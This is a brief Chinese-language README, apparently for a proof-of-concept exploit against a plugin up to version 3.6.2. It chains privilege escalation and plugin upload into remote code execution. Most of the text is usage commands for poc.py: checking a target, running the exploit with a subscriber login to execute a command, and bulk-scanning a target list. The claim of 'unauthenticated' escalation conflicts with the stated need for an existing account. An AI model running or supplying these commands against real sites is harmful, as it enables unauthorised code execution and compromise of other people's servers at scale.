未认证权限提升 → 插件上传 → RCE。
<= 3.6.2>= 3.6.3# 检查单个目标
python poc.py -u https://target.example --mode check
# 完整利用(需要现有的低权限账户)
python poc.py -u https://target.example --mode exploit \
-nu subscriber -np 'Password123' -c id
# 批量扫描
python poc.py -l targets.txt --mode check -t 30